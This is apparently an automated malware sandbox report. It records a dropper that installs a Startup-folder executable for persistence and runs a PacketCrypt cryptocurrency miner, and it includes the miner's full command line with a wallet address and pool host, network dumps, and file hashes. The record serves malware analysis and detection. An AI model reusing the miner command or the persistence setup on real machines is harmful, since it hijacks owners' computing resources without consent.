Jan 7, 2025 14:01:48.902046919 CET	2472	OUT	Data Raw: 63 38 30 1f 3d 69 4c 62 ab ab d4 18 2b de b4 85 59 6e a5 fa e5 29 26 63 ec 5d ec 42 c5 e3 17 5d b2 ae 81 48 f9 ca f5 5a 1c f9 f0 88 86 cc f8 9c e9 9b 2c 52 fa 01 91 a8 04 2f 3c 14 6e d7 c3 15 30 52 3e 44 dd f0 b1 87 59 8a 52 4e 06 ee 14 e7 06 5d Data Ascii: c80=iLb+Yn)&c]B]HZ,R/<n0R>DYRN]Lp%xx++0l;f8tChwlvodC'Ce7DO^6Ny@I"S64D6,3B_Rxq!="['M682?}W70yy
Jan 7, 2025 14:01:48.902064085 CET	2472	OUT	Data Raw: f2 ec 10 0f 78 8f 6c d7 28 83 b7 4e 98 a6 26 32 a8 42 f4 cc 93 82 ab cc 4c 5c 6f 47 01 68 26 59 d3 56 33 e4 b1 69 b0 a9 d2 1f 35 fa af 64 ef 0a 1b 33 f9 5c 3e 7e 19 ef 31 48 22 0b 39 ba 69 1b e7 0b c2 2a 5c e5 df 12 47 23 f3 96 2d d4 c3 75 83 0b Data Ascii: xl(N&2BL\oGh&YV3i5d3\>~1H"9i\G#-u=-?\|r/>nAP+;,^4&~z`Tq_wM\|w`)B\"QNcy/Tysll&-<2[R\bwngz_
Jan 7, 2025 14:01:48.902139902 CET	2472	OUT	Data Raw: dd 5b 82 fa 57 cd f6 6b da 4c b3 10 65 72 db 9f 61 30 61 40 a1 46 cc 45 61 24 be ba f0 06 93 65 84 e9 97 6c 3b 0d 59 1a d8 b3 bf 6d 5e ff ad 58 10 c9 ac 64 26 ca 5e bb 3f 8e b3 e5 8d 8f b2 88 78 82 78 7f fc 93 66 35 fe 42 b1 7a 31 74 38 2b 64 e8 Data Ascii: [WkLera0a@FEa$el;Ym^Xd&^?xxf5Bz1t8+d9CKzx)[gntS/(`*U^xz]Ht[0@j:Xp_]Cy1RVA}Knoz\|LGS6!$G
Jan 7, 2025 14:01:48.945111036 CET	35844	OUT	Data Raw: e9 aa 78 71 21 3d 9e b7 68 cf 4a af d4 06 36 fb 13 b1 82 9e 21 0b d3 e0 6f d6 4b 1d b9 d6 01 ee 59 50 23 af e9 fb 0d ab d8 8c f7 22 f2 91 0d 0a 34 30 30 0d 0a 01 d8 43 06 4c 7c 8c e1 b4 43 17 1f 6c 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: xq!=hJ6!oKYP#"400CL\|ClJ+_ZSnN[7VHXp/^ycM"['{YXS))VFOzd/h2sJz/NW)b]X
Jan 7, 2025 14:01:50.242786884 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:01:50 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 36 30 33 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 36 30 33 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 39 31 30 31 33 38 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 31 30 30 2d 42 45 43 43 41 45 38 34 41 37 32 46 32 44 31 38 31 46 33 32 37 43 41 30 34 32 31 36 33 31 37 38 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":603,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":603,"totalLen":0,"target":521618356,"time":1736254910138,"eventId":"cah-2837100-BECCAE84A72F2D181F327CA042163178"}}
Jan 7, 2025 14:01:50.456927061 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:01:50 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 36 30 33 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 36 30 33 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 39 31 30 31 33 38 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 31 30 30 2d 42 45 43 43 41 45 38 34 41 37 32 46 32 44 31 38 31 46 33 32 37 43 41 30 34 32 31 36 33 31 37 38 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":603,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":603,"totalLen":0,"target":521618356,"time":1736254910138,"eventId":"cah-2837100-BECCAE84A72F2D181F327CA042163178"}}

Target ID:	0
Start time:	07:57:53
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\dr0p.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dr0p.exe"
Imagebase:	0x400000
File size:	541 bytes
MD5 hash:	5290766026D3727C3262FD48DB6DB0A4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	4
Start time:	07:58:31
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe"
Imagebase:	0x7ff68e670000
File size:	42'445'246 bytes
MD5 hash:	5F6CDA0F181FE14E6D395CDB50C37C41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	6
Start time:	07:58:36
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\packetcrypt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\packetcrypt.exe" ann -p pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a http://pool.pkt.world
Imagebase:	0x7ff70b2a0000
File size:	23'509'956 bytes
MD5 hash:	82C7D11916FDFBF24EAE6BF9200A48C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Rust
Reputation:	low
Has exited:	false

Target ID:	7
Start time:	07:58:37
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Execution Coverage:	98.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Execution Coverage:	17.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	75%
Total number of Nodes:	4
Total number of Limit Nodes:	0